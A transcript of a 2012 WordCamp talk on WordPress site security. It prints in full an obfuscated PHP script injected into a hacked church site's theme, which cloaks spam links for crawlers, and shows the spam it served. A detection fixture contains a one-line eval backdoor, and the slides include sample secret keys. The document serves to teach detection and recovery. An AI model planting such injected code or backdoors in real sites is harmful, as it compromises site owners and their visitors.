Google says you shouldn’t visit my church wcgr
Justin Jones speaking about WordPress website security at WordCamp Grand Rapids, August 18, 2012

Presentation Transcript

    • Justin Jones • Fort Wayne, IN @jjonesftw
    • I’m Justin Jones
      - Teacher
      - Church worker
      - WordPress hobbyist
      - Podcast cohost at “The Weekly Theme Show”, http://wpcandy.com
      - @jjonesftw
      - justinjones.net
    • Why would someone want to hack my site?
      - The world doesn’t revolve around you
      - Crime of opportunity
      - Don’t leave your front door unlocked
    • Why would someone want to hack my site?
      - Imperva selected 50 sites at random, July 2012:
        - Expect attack incidents 120 days per year (33% of the time); some experienced 292 days (80%)
        - Attacked 274 times per year
        - Attack campaigns average 7 minutes 42 seconds, and can range upward from there
        - SQL injection is the most frequent attack
    • Why would someone want to hack my site?
      - “Black hat” SEO
        - Hidden links, footer credit links, back links, etc.
      - To make money directly
        - Affiliate sales
        - Rogue virus scanners
    • Why would someone want to hack my site?
      - Serve up images and content for spam email
    • Why would someone want to hack my site?
    • What do they do while they’re poking around my site?
      - Alter robots.txt and .htaccess
        - Some changes are specific to “robots” or to the HTTP Referer header
      - Create backdoors in unsuspecting .php files
      - Add their own .php files and images to serve up their payload content
    • What do they do while they’re poking around my site?
      - Inject code into theme files, like header.php. The block below is the injected code from the slide; the transcript has dropped the single quotes around the string fragments, so read it as an illustration rather than a byte-exact copy. Decoding the base64 strings in `_1572011439()` shows what it does: the first array assembles PHP function names from fragments joined with `.` (error_reporting, function_exists, file_get_contents, preg_match, unserialize, gzuncompress, base64_decode, ...), and the second array holds crawler User-Agent fragments (google, slurp, msnbot, bingbot, crawl, spider, ...), the names REMOTE_ADDR, HTTP_USER_AGENT and REQUEST_URI, the file name license.txt, a `botko` query parameter and the string `<br>`. Error reporting is switched off, the visitor’s IP is checked against CIDR ranges stored in license.txt (or .core), and the User-Agent is checked against the bot list. If either matches, or `?botko` is in the URL, a base64-encoded, gzipped, serialized link list is read from license.txt, 75 entries are picked by a small LCG seeded from the request URI length (so each URL always shows the same links), and they are echoed separated by `<br>`. A human visitor sees nothing; a crawler sees the spam links on the next slide.

```php
<?//1234
$GLOBALS[_2008634924_]=Array(error_re .porting,function_e .xi .st .s,fop .e .n,fwrite, .f.clos .e, .s .trstr,strtolower,ex .p .lode,ip2long,i .p2l .ong,l .ong2ip,ip2long,.fi .le_exists,pre .g_mat .ch,file_ge .t_contents,pr .eg_match,f .i .le ._get ._c .ont.ent .s,u .nseriali .ze,count,range,a .rra .y_splice,array_ .values,preg ._matc .h,file._get_ .contents,un .ser .ial .iz .e,gzuncompress,base .64_deco .de, .str .len);
function _1572011439($i){$afa=Array(Ym90a28=,ZmlsZV9wd .XRf .Y2 .9ud .GV .udHM=,dw==,Z29v .Z .2 .xl,c2x.1cnA=, .bXN .uY .m .90,Yml .u .Z2JvdA==,Ym90,Y .3 .Jhd2 .w .=, .c3BpZGV .y,cm9.ib3Q=, .SH .R0cENsaWVudA= .=, .Y3 .V .y .b .A .==, .c2 .Nvb3Rlcg==,d3d3c3 .Rlcg==,.UHl0aG9 .u, .dX .J .sb .Gli,cG .Vyb .A= .=,bGlid3d3,b .HlueA==,VkIgUHJva .mVjd .A=.=,U .Hl0aG .9uLXVybGxpYi8yL .j .Y=,TW9 .6a .Wx .sYS .82N .jYuKD .Y .p,TW9 .6 .aWxs.YS80L .jAgK .GNvbXB .hdGli .b .G .U7IE1 .TS .UUgNi4w .OyBXa .W5kb3dzIE5UIDUuMS .k=,T.W96aWx .sYS .8 .0LjA .g .KGNv .bX .Bh .dGl .i .bGU .7KQ==, .TW96aWxsYS80 .LjAgK .GNvbXB.hdGlibG .U7IE1TSUUgNS4w .MDsg .V .2luZG .93cyA5OCk=, .TW .96 .aWxsYS8 .0LjAgKG .NvbXBhdGlibG.U7I .E .1 .TSUUg .N .i4wO .yBX .aW5 .kb3dzIE5UIDUuMTsg .U1YxK .Q .==, .TW96 .aWxs .YS80.LjAg .KGNvb .X .Bh .dGlibGU7IE .1TSUUgN .i4wOyBXaW5kb3dzIE5UIDU .uMTsgLk5FV .C .BDTF .IgM .S4wL.jM .p,Lw==,Lm .N .vcmU .=,fDxpc .D4oLiopPC9pc .D58VWl .z,LmNvcmU=, .fDx .p .cD4.oLiopPC9pc .D58V .W .lz,bGlj .ZW .5zZ .S50eH .Q=,U .kVNT1RF .X0 .FERFI=,SF .R .U.UF9VU0 .VSX0FH .RU .5U,Ym90 .a2 .8=,fDx .pbnQ+KC4q .K .T .wv .aW50Pnx .VaX.M=,bGljZW5zZS50 .eHQ=, .UkVR .VUV .TVF9VUkk=, .PGJ .yPg .==);return base64_decode($afa[$i]);}
if(isset($_GET[_1572011439(0)])){}else{$GLOBALS[_2008634924_][0](0);}
if(!$GLOBALS[_2008634924_][1](_1572011439(1))){function l__0($_0,$_1){$_2=@$GLOBALS[_2008634924_][2]($_0,_1572011439(2));if(!$_2){return false;}else{$_3=$GLOBALS[_2008634924_][3]($_2,$_1);$GLOBALS[_2008634924_][4]($_2);return $_3;}}}
function l__1($_4){$_5=array(_1572011439(3),_1572011439(4),_1572011439(5),_1572011439(6),_1572011439(7),_1572011439(8),_1572011439(9),_1572011439(10),_1572011439(11),_1572011439(12),_1572011439(13),_1572011439(14),_1572011439(15),_1572011439(16),_1572011439(17),_1572011439(18),_1572011439(19),_1572011439(20),_1572011439(21),_1572011439(22),_1572011439(23),_1572011439(24),_1572011439(25),_1572011439(26),_1572011439(27));foreach($_5 as $_6){if($GLOBALS[_2008634924_][5]($GLOBALS[_2008634924_][6]($_7),$_6)){return($_6);}}return(false);}
function l__2($_8,$_9){$_10=$GLOBALS[_2008634924_][7](_1572011439(28),$_8);$_11=$GLOBALS[_2008634924_][8]($_10[0]);$_12=$GLOBALS[_2008634924_][9]($_10[1]);$_13=$GLOBALS[_2008634924_][10]($_12)== $_10[1]?$_12:0xffffffff <<(32-$_10[1]);$_14=$GLOBALS[_2008634924_][11]($_9);return($_14&$_13)==($_11&$_13);}
function l__3($REMOTE_ADDR){if($GLOBALS[_2008634924_][12](_1572011439(29))){$GLOBALS[_2008634924_][13](_1572011439(30),$GLOBALS[_2008634924_][14](_1572011439(31)),$_15);}else{$GLOBALS[_2008634924_][15](_1572011439(32),$GLOBALS[_2008634924_][16](_1572011439(33)),$_15);}$_16=$GLOBALS[_2008634924_][17]($_15[1]);foreach($_16 as $_9){if(l__2($_9,$REMOTE_ADDR))return true;}return false;}
function l__4($_17,$_18){$_19=($_17*25173+13849)%$_18;return(int)$_19;}
function l__5($_20,$_21,$_18){$_22=array();$_23=$GLOBALS[_2008634924_][18]($_20);if($_23<$_18){return false;}$_24=$GLOBALS[_2008634924_][19](0,$_23-1);$_21=$_21%$_23;for($_25=0;$_25<$_18;$_25++){$_26=l__4($_21,$_23--);$_22[]=$_20[$_24[$_26]];if(!$_23){break;}$GLOBALS[_2008634924_][20]($_24,$_26,1);$_24=$GLOBALS[_2008634924_][21]($_24);$_21=$_26;}return $_22;}
$_27=l__3($_SERVER[_1572011439(34)]);
$_28=l__1(@$_SERVER[_1572011439(35)]);
if($_27 or isset($_GET[_1572011439(36)]) or $_28){$GLOBALS[_2008634924_][22](_1572011439(37),$GLOBALS[_2008634924_][23](_1572011439(38)),$_29);$_30=$GLOBALS[_2008634924_][24]($GLOBALS[_2008634924_][25]($GLOBALS[_2008634924_][26]($_29[1])));$_31=l__5($_30,100+$GLOBALS[_2008634924_][27]($_SERVER[_1572011439(39)]),75);for($_25=0;$_25<75;$_25++)echo $_31[$_25] ._1572011439(40);}
//1234?>
```
    • What do they do while they’re poking around my site?
      - Inject code into theme files, like header.php. This is what a crawler received from the injected header.php on the previous slide, one cloaked link per line:

```html
<a href="http://oakhurstchurch.com/news/index.php?p=alison-carroll-hot">alison carroll hot</a><br>
<a href="http://oakhurstchurch.com/news/index.php?p=jessica-lowndes">Jessica Lowndes</a><br>
<a href="http://oakhurstchurch.com/news/index.php?p=zelda-williams">zelda williams</a><br>
<a href="http://oakhurstchurch.com/news/index.php?p=bush">bush</a><br>
<a href="http://oakhurstchurch.com/news/index.php?p=teresa-scanlan">Teresa Scanlan</a><br>
<a href="http://oakhurstchurch.com/news/index.php?p=leyla">leyla</a><br>
<a href="http://oakhurstchurch.com/news/index.php?p=heather-mills">Heather Mills</a><br>
<a href="http://oakhurstchurch.com/news/index.php?p=keshia-knight-pulliam-polly">keshia knight pulliam polly</a><br>
<a href="http://oakhurstchurch.com/news/index.php?p=moira-kelly-biography">moira kelly biography</a><br>
<a href="http://oakhurstchurch.com/news/index.php?p=smurfs">smurfs</a><br>
<a href="http://oakhurstchurch.com/news/index.php?p=laurene-jobs">Laurene jobs</a><br>
<a href="http://oakhurstchurch.com/news/index.php?p=bransales-importadora">bransales importadora</a><br>
<a href="http://oakhurstchurch.com/news/index.php?p=boo-boo-stewart">boo boo stewart</a><br>
<a href="http://oakhurstchurch.com/news/index.php?p=irina-shayk-y-cristiano-ronaldo">irina shayk y cristiano ronaldo</a><br>
<a href="http://oakhurstchurch.com/news/index.php?p=vanessa-angel">Vanessa Angel</a><br>
<a href="http://oakhurstchurch.com/news/index.php?p=lineas-del-metro-mexico-df">lineas del metro mexico df</a><br>
<a href="http://oakhurstchurch.com/news/index.php?p=brian-urlacher">brian urlacher</a><br>
<a href="http://oakhurstchurch.com/news/index.php?p=jessie-palmer">jessie palmer</a><br>
<a href="http://oakhurstchurch.com/news/index.php?p=jessie-palmer">Jessie Palmer</a><br>
<a href="http://oakhurstchurch.com/news/index.php?p=mark-hamill-before-and-after-crash">mark hamill before and after crash</a><br>
<a href="http://oakhurstchurch.com/news/index.php?p=jessica-jane-clement">jessica-jane clement</a><br>
<a href="http://oakhurstchurch.com/news/index.php?p=ashanti">ashanti</a><br>
<a href="http://oakhurstchurch.com/news/index.php?p=linea-del-metro-ciudad-de-mexico">linea del metro ciudad de mexico</a><br>
<a href="http://oakhurstchurch.com/news/index.php?p=lady-antebellum-photos">lady antebellum photos</a><br>
<a href="http://oakhurstchurch.com/news/index.php?p=heidi-range">heidi range</a><br>
<a href="http://oakhurstchurch.com/news/index.php?p=miley-cyrus-nude">miley cyrus nude</a><br>
<a href="http://oakhurstchurch.com/news/index.php?p=elizabeth-hurley">elizabeth hurley</a><br>
<a href="http://oakhurstchurch.com/news/index.php?p=ty-pennington-girlfriend">Ty Pennington Girlfriend</a><br>
<a href="http://oakhurstchurch.com/news/index.php?p=lsm05">lsm05</a><br>
<a href="http://oakhurstchurch.com/news/index.php?p=ls-magazine-pics">ls magazine pics</a><br>
<a href="http://oakhurstchurch.com/news/index.php?p=megan-mullally-naked">megan mullally naked</a><br>
<a href="http://oakhurstchurch.com/news/index.php?p=ls-model">ls model</a><br>
<a href="http://oakhurstchurch.com/news/index.php?p=mensagens-lindas">mensagens lindas</a><br>
<a href="http://oakhurstchurch.com/news/index.php?p=justin-bieber-bulge">justin bieber bulge</a><br>
<a href="http://oakhurstchurch.com/news/index.php?p=lg-esteem-review">lg esteem review</a>
```
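A first pass at finding this kind of injection on your own install, written for this page as an added example (it is not the speaker's code; the indicator patterns, the uploads rule and the constructed fixture tree are assumptions):

```shell
#!/bin/sh
# Added example, not the speaker's code: a first-pass scan of a WordPress tree
# for the kinds of injected PHP shown on the slides above. The indicator list
# and the fixture are assumptions; every hit still needs a human to read it.

# Print every .php file under $1 that contains a common obfuscation primitive
# (base64_decode, gzuncompress, gzinflate, str_rot13, eval, create_function)
# or the bareword-concatenation trick from the slide's sample ("error_re .porting").
scan_suspicious_php() {
    pattern='base64_decode *\(|gzuncompress *\(|gzinflate *\(|str_rot13 *\(|eval *\(|create_function *\(|[a-z_]+ \.[a-z_]+ *[,)]'
    find "$1" -type f -name '*.php' -print | sort | while read -r f; do
        if grep -Eq "$pattern" "$f"; then
            printf '%s\n' "$f"
        fi
    done
}

# Print PHP files under wp-content/uploads. WordPress never writes PHP there
# itself; attackers routinely do (the "add their own .php files" bullet above).
find_uploads_php() {
    find "$1/wp-content/uploads" -type f -name '*.php' -print 2>/dev/null | sort
}

# Print files changed in the last N days (default 7). Compare against the dates
# you actually ran updates; anything else is worth opening.
recently_modified() {
    find "$1" -type f -mtime "-${2:-7}" -print | sort
}

# Constructed fixture: a tiny tree with one clean theme file, one header.php
# infected in the style of the slide's sample, and a dropped file in uploads.
make_demo_tree() {
    d=$(mktemp -d)
    mkdir -p "$d/wp-content/themes/demo" "$d/wp-content/uploads/2012/08"
    cat > "$d/wp-content/themes/demo/functions.php" <<'EOF'
<?php
add_action('wp_head', 'demo_head');
function demo_head() { echo '<meta name="generator" content="demo">'; }
EOF
    cat > "$d/wp-content/themes/demo/header.php" <<'EOF'
<?php //1234 $GLOBALS[_2008634924_]=Array(error_re .porting,function_e .xi .st .s,base .64_deco .de);
echo $GLOBALS[_2008634924_][2]('PGJyPg==');
EOF
    cat > "$d/wp-content/uploads/2012/08/index.php" <<'EOF'
<?php eval(base64_decode($_POST['c']));
EOF
    printf '%s\n' "$d"
}

demo=$(make_demo_tree)
echo "== obfuscation indicators"; scan_suspicious_php "$demo"
echo "== php under uploads";      find_uploads_php "$demo"
echo "== changed in last day";    recently_modified "$demo" 1
rm -rf "$demo"
```

Run `scan_suspicious_php /path/to/wordpress` on a copy of the site rather than over FTP on the live tree. Legitimate plugins do call base64_decode, so treat the list as a reading queue, and cross-check `recently_modified` against the days you actually ran updates.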
    • How Do They Get In?
      - Outdated versions of WordPress
      - Outdated themes and plugins
      - Hosting providers behind the times
      - Insecure password / brute force
      - Compromised computer
        - Passwords cached in FTP clients, passwords stored in an unencrypted text file, etc.
      - Insecure internet connection
        - Rogue access points
        - Packet sniffers on public WiFi
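The “insecure password / brute force” entry is the one you can see coming in the web server log. As an added example, not from the talk, an awk filter wrapped in a function that counts login POSTs per client over a constructed combined-format log (the threshold, the xmlrpc.php addition and the log lines are assumptions):

```shell
#!/bin/sh
# Added example, not the speaker's code: spot password brute forcing against
# wp-login.php in an Apache combined-format access log with awk. The threshold
# is an assumption (real users rarely POST the login form more than a handful of
# times an hour). xmlrpc.php is counted as well; its system.multicall method
# lets one request carry hundreds of guesses, which the talk does not cover.

# Print "count ip" for every client with at least $2 login POSTs in log $1,
# busiest first. Fields of the combined format: $1 client IP, $6 the method
# with its opening quote ("POST), $7 the request path.
wp_login_bruteforce() {
    awk -v min="$2" '
        $6 == "\"POST" && (index($7, "/wp-login.php") == 1 || index($7, "/xmlrpc.php") == 1) { n[$1]++ }
        END { for (ip in n) if (n[ip] >= min) printf "%d %s\n", n[ip], ip }
    ' "$1" | sort -rn
}

# Constructed fixture: 25 login POSTs from one client in 25 minutes, next to a
# real user who loaded the form once, logged in once and went to wp-admin.
make_demo_log() {
    f=$(mktemp)
    i=0
    while [ "$i" -lt 25 ]; do
        printf '203.0.113.7 - - [18/Aug/2012:10:%02d:00 -0400] "POST /wp-login.php HTTP/1.1" 200 3641 "-" "Mozilla/4.0"\n' "$i" >> "$f"
        i=$((i + 1))
    done
    printf '198.51.100.4 - - [18/Aug/2012:10:30:00 -0400] "GET /wp-login.php HTTP/1.1" 200 3641 "-" "Mozilla/5.0"\n' >> "$f"
    printf '198.51.100.4 - - [18/Aug/2012:10:30:05 -0400] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"\n' >> "$f"
    printf '198.51.100.4 - - [18/Aug/2012:10:30:06 -0400] "GET /wp-admin/ HTTP/1.1" 200 9000 "-" "Mozilla/5.0"\n' >> "$f"
    printf '%s\n' "$f"
}

log=$(make_demo_log)
echo "== clients with 20 or more login POSTs"; wp_login_bruteforce "$log" 20
rm -f "$log"
```

Feed a real log with `wp_login_bruteforce /var/log/apache2/access.log 20`; the addresses it prints are candidates for a lockout rule, which is what the Login Lockdown-style plugins later in the talk automate.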
    • What are the consequences?
      - Google will punish you.
        - Google Safe Browsing warning or a manual removal action
    • What are the consequences?
      - Other “blacklisting” like Norton Safe Web, PhishTank, Opera, Sucuri, and many others
      - Spammy content will get indexed by every search engine
        - Don’t forget about directory listing sites, like Google Places / Google Maps
      - Your host may dump you for violating its TOS
    • What are the consequences?
      - Be a good neighbor! Security is everyone’s responsibility
    • What are the consequences?
      - Malware cost the US economy 2.2 billion dollars in lost productivity in 2011
      - Are you an ecommerce site?
        - The payment gateway is probably offsite, but what about people’s email addresses?
      - Membership site?
        - Many people re-use passwords
        - LinkedIn, Last.fm and many others were breached recently
      - Business or organization?
        - How much street cred will you earn serving content from exotic-dildos.co.cc?
    • Is WordPress insecure?
      - No.
      - The Pharma hack had a patch out before it was exploited
      - WordPress has a target on its back
        - WordPress is used by over 14.7% of Alexa Internet’s “top 1 million” websites and, as of August 2011, manages 22% of all new websites.
      - Some theme and plugin authors are lazy/sloppy, or use deprecated/inefficient methods
      - You are your own worst enemy!
        - Think about Windows XP back in like 2002
    • Is WordPress insecure?
      - Be careful who you trust
        - Everyone is a “developer” now
        - NEVER download and install for free a theme that you should have paid for
          - Shady scraper sites, torrents, etc.
        - “Having a website *should* cost you more than $300 a year. If it doesn’t, then you’re doing it wrong.” --Otto
    • Is WordPress insecure?
      - Be careful who you trust
        - Be very wary of downloading a free theme from outside the WordPress.org theme repo
        - Use “Theme Authenticity Checker” and “Theme Check”
        - Siobhan McKeown at WPMU.org Googled “free wordpress themes”
          - Top 10 results: 1 was wordpress.org; 1 was poorly coded; 8 were actively using encrypted code to insert spammy links
        - Use trusted theme marketplaces or commercial shops
    • Is WordPress insecure?
      - Be careful who you trust
        - Choose plugins carefully
          - Trusted commercial plugin shops
          - WordPress.org directory
        - More plugins != insecure
        - Check user ratings
        - Support forum requests
        - Check community blogs
        - WordPress.org profile pages for favorites and other plugins by the same author
    • Prepare for Disaster
      - It’s going to happen
      - Maintain regular backups
        - Server side or plugins
      - Be registered with Google Webmaster Tools
      - Know how to contact your hosting provider
      - Know a developer
      - Visit your site
      - Watch your stats
    • Update. Update. Update.
      - Source: http://churchm.ag/wordpress-updates/
    • Update. Update. Update.
      - August 2011, when 3.2.1 was the most current release
      - Less than half of the top 100k sites running WordPress were up to date!
      - WordPress iterates quickly to patch security holes. Keep updated to benefit from their work
      - Source: http://churchm.ag/wordpress-updates/
    • Update. Update. Update.
      - WordPress core, .org plugins and .org themes can use the core update functionality
      - Some commercial themes and plugins have their own one-click upgrade; some are manual only
      - Some have notifications, some don’t
      - Sign up for WordPress.org release notifications from the download page
    • Here’s Where This Gets Technical
      - I’ll have these slides up on SlideShare
      - I’ve reserved time at the end for questions, and I’ll be available after for individual questions
    • It’s the week before Easter and your church site is serving up topless photos of celebrities. Now What?
      - Take a deep breath and crack open a beer. You’ve got some work ahead of you.
      - Get back control of your site
      - Get the site offline if you can!
    • It’s the week before Easter and your church site is serving up topless photos of celebrities. Now What?
      - Change *every* single one of your passwords
        - Domain registrar, hosting account, all WordPress users, SQL database username and password, FTP account password
        - I suggest changing your email account passwords
      - Hire a professional
        - Check out http://sucuri.net/
        - Many others out there, Google them up!
    • It’s the week before Easter and your church site is serving up topless photos of celebrities. Now What?
      - Regenerate WordPress secret keys / salts
        - Manually in wp-config.php or use a plugin. Changing them invalidates every existing login cookie, including the attacker’s. The values below are the ones on the slide, with the quotes the transcript dropped restored; never reuse them, generate your own (the WordPress.org service at https://api.wordpress.org/secret-key/1.1/salt/ produces a fresh set in this exact format).

```php
define('AUTH_KEY',         'n%foh;/v6$)0<t]=Be]o~2L?nopubK;b1-P(x=~dCyY[pL]^Ry//=I$y.w-8&HGP');
define('SECURE_AUTH_KEY',  'q#h,K.OZ=-IT)(-`3`)G1Kr-&ZP,!CEM1<sMx-1eDI<H*BfO2G@~ bD<)]8rW|{/');
define('LOGGED_IN_KEY',    'Vuvu|_`AGu@) >*7K~l]B1v-d3-e}<Qo#hki8Fy(Bov:T~wOm#8hqHZbWP2khxR}');
define('NONCE_KEY',        'B&8:S*:tZR700I9]3~sWI0Rv1+9e_O{KXcc+`a!eB-wV$+Cctv$q*Yb+c.5w<xns');
define('AUTH_SALT',        'bpx*[xMhU<FjufQ*``oc&NNdvz,-FJ=|~+$G:i9qaCFRY>u,-}%-Cc-G|!5r0|D@');
define('SECURE_AUTH_SALT', 'S+C/f6B6[Y+uGJt!@K|c:49tA}xB!5_zE6RZ+ AT.bsFNvD^-YGOI@HG8V:YbR?q');
define('LOGGED_IN_SALT',   '~oP,M4HQ8 ,M$<A[(`HZ@>_BC,Yo/Y].kw+{g^KnLPzB[UAI_Z6h6M+KbZ|.|<$-');
define('NONCE_SALT',       'KW*LbM<2qL7LAZZ!vdto?c?!(5eSb)|o$BA;{F-CLZB=M%_QfbdW[@lSDT_]ImE[');
```
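Rotating those keys by script rather than by hand, as an added example that is not part of the talk (it assumes the one-define-per-line layout the WordPress installer writes, and a character set chosen to stay inside a PHP single-quoted string):

```shell
#!/bin/sh
# Added example, not the speaker's code: rotate the eight keys/salts in
# wp-config.php from /dev/urandom instead of pasting values by hand. New values
# invalidate every existing WordPress login cookie, which is exactly what you
# want after a compromise. Assumes the standard define('NAME', '...'); lines
# the WordPress installer writes, one per line.

# One 64-character value. The set deliberately has no quote, backslash, $ or &,
# so it is safe inside a PHP single-quoted string and in the awk substitution.
new_salt() {
    LC_ALL=C tr -dc 'A-Za-z0-9!#%^*()_+=[]{}|:;,.<>?~-' < /dev/urandom | head -c 64
}

# Replace the value of each key in $1, keeping the old file at $1.bak.
rotate_wp_salts() {
    cfg=$1
    cp "$cfg" "$cfg.bak"
    for name in AUTH_KEY SECURE_AUTH_KEY LOGGED_IN_KEY NONCE_KEY \
                AUTH_SALT SECURE_AUTH_SALT LOGGED_IN_SALT NONCE_SALT; do
        val=$(new_salt)
        awk -v n="$name" -v v="$val" -v q="'" '
            $0 ~ ("^[ \t]*define\\(" q n q) { print "define(" q n q ", " q v q ");"; next }
            { print }
        ' "$cfg" > "$cfg.tmp" && mv "$cfg.tmp" "$cfg"
    done
}

# Read back the value stored for key $2 in $1 (empty if the key is absent).
salt_value() {
    awk -F"'" -v n="$2" '$2 == n { print $4 }' "$1"
}

# Constructed fixture: the placeholder lines a fresh wp-config.php ships with.
make_demo_config() {
    f=$(mktemp)
    for name in AUTH_KEY SECURE_AUTH_KEY LOGGED_IN_KEY NONCE_KEY \
                AUTH_SALT SECURE_AUTH_SALT LOGGED_IN_SALT NONCE_SALT; do
        printf "define('%s', 'put your unique phrase here');\n" "$name" >> "$f"
    done
    printf '%s\n' "$f"
}

cfg=$(make_demo_config)
rotate_wp_salts "$cfg"
echo "== rotated wp-config.php"; cat "$cfg"
rm -f "$cfg" "$cfg.bak"
```

Every user, including whoever holds a stolen cookie, is logged out the moment the new file is in place. If you would rather not trust the host's /dev/urandom, https://api.wordpress.org/secret-key/1.1/salt/ returns eight define lines in the same format that you can paste over the old ones.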
    • It’s the week before Easter and your church site is serving up topless photos of celebrities. Now What?
      - Backup
      - Restore from a previous backup
      - Find and delete all the junk they added
        - Very insidious: creating rogue sitemaps, modifying .htaccess files, creating backdoors, adding index.php files to override permalinks, etc.
        - The posts and images they added are now in the database, so check there too
      - Reinstall WordPress core, plugins and themes
    • It’s the week before Easter and your church site is serving up topless photos of celebrities. Now What?
      - Begin the process of restoring your good name
        - Request delisting of bogus content from Google and other search engines
          - Very tedious, manual process
        - Request reevaluation from blacklisting services
        - Don’t forget about other services that pull content from your site, like Google Places
        - Wait it out. This will take weeks and months
      - Prepare better for next time
    • Harden Your Site. The Easy Stuff.
      - Keep up to date! WordPress, plugins, themes – but also the PHP version on your host
      - Use strong passwords – no words! Not P@$$woRd either.
        - Consider using a password manager
      - Remove the “admin” user
    • Harden Your Site. The Easy Stuff.
      - Only connect using SFTP
      - Never ever hack core WordPress files
      - Keep a clean house!
        - Other WP installs, other PHP services, plugins, old themes
      - Disable user registration
    • Harden Your Site. The More Complicated Stuff.
      - Store your wp-config file outside of public_html
        - Done at install, or it can be moved later (WordPress also looks one directory above its install for wp-config.php)
      - Change the database prefix
      - Use strong database passwords
      - Use proper file permissions: 755 for directories, 644 for files
        - If a plugin or theme asks you to set 777, avoid it.
      - Only log in to the site using SSL (https://...)
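The permission and wp-config.php items above, checked and fixed by script, as an added example that is not part of the talk (the 640 choice for wp-config.php and the fixture tree are assumptions; see the comments):

```shell
#!/bin/sh
# Added example, not the speaker's code: a permission audit for a WordPress
# tree that reports what the slide warns about, plus a fix-up applying the
# 755 (directories) / 644 (files) baseline and tightening wp-config.php to 640.
# 640 assumes PHP runs as your user or as a member of your group; use 600 if
# the web server runs as you, and 644 only if it runs as an unrelated user.

# List world-writable files and directories (symlinks skipped), i.e. the 777
# that some plugin or theme told the owner to set.
world_writable() {
    find "$1" ! -type l -perm -002 -print | sort
}

# Report on wp-config.php: still inside the web root (WordPress also loads it
# from the parent directory, out of the document root), and readable by "other".
audit_wp_config() {
    root=$1
    if [ -f "$root/wp-config.php" ]; then
        echo "wp-config.php is inside the web root; consider moving it to $(dirname "$root")/"
        if [ -n "$(find "$root/wp-config.php" -perm -004 -print)" ]; then
            echo "wp-config.php is readable by every user on this host"
        fi
    fi
}

# Apply the baseline: 755 directories, 644 files, 640 wp-config.php.
fix_wp_perms() {
    root=$1
    find "$root" -type d -exec chmod 755 {} +
    find "$root" -type f -exec chmod 644 {} +
    if [ -f "$root/wp-config.php" ]; then
        chmod 640 "$root/wp-config.php"
    fi
}

# Constructed fixture: an uploads directory left at 777, a plugin file at 666
# and a wp-config.php at 644 in the web root. Everything else is normalised
# first so the result does not depend on the umask of whoever runs this.
make_demo_tree() {
    d=$(mktemp -d)
    mkdir -p "$d/wp-content/uploads" "$d/wp-content/plugins/demo"
    printf '<?php\n' > "$d/wp-content/plugins/demo/demo.php"
    printf "<?php define('DB_PASSWORD', 'constructed-example');\n" > "$d/wp-config.php"
    find "$d" -type d -exec chmod 755 {} +
    find "$d" -type f -exec chmod 644 {} +
    chmod 777 "$d/wp-content/uploads"
    chmod 666 "$d/wp-content/plugins/demo/demo.php"
    printf '%s\n' "$d"
}

demo=$(make_demo_tree)
echo "== before"; world_writable "$demo"; audit_wp_config "$demo"
fix_wp_perms "$demo"
echo "== after";  world_writable "$demo"; audit_wp_config "$demo"
rm -rf "$demo"
```

Run the audit before and after `fix_wp_perms`; the one line that remains, wp-config.php still in the web root, is the move-it-up-a-directory step, a single `mv` you do once and by hand.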
    • Harden Your Site. The More Complicated Stuff.
      - Plugins! Plugins! Plugins!
        - Monitor core / template files: “WordPress File Monitor Plus”
        - Scan template files for suspicious code: “AntiVirus”
        - WP and server security settings: “WebsiteDefender WordPress Security”
        - Keep up to date: “Update Notifications”
    • Harden Your Site. The More Complicated Stuff.
      - Plugins! Plugins! Plugins!
        - “WordPress Firewall 2”
        - “Block Bad Queries”
        - Backup: VaultPress, BackupBuddy
        - Login Lockdown: lock out excessive retries and mask login errors
        - Many others available for two-factor auth, etc.
        - The Sucuri plugin has a firewall to block known bad IPs
    • Should you really be hosting your own site?
      - Do you like to change your own oil in your car, or take it to the Jiffy Lube?
      - WordPress.com is a great resource for most personal bloggers. Focus on writing your content.
      - Consider a WordPress managed host.
        - WP Engine, ZippyKid, Pagely, etc.
      - Don’t be afraid to pay someone!
        - How important is this project?
        - What is your time worth?
    • Resources
      - Codepoet.com
        - eBook “Locking Down WordPress”
    • Resources
      - These slides on SlideShare
      - Search for slides from Dre Armeda and Brad Williams
      - WordPress.org Codex
      - Otto on WordPress
      - Sucuri.net – service and blog
      - Lockdown WordPress – A Security Webinar with Dre Armeda
        - 1.5 hour interview – great resource!
      - Countless plugins on the WordPress.org repo
      - http://sitecheck.sucuri.net/scanner/
    • Questions?
      - No question is stupid. We’re all here to learn!
      - If you’re smarter than I am, please jump in here.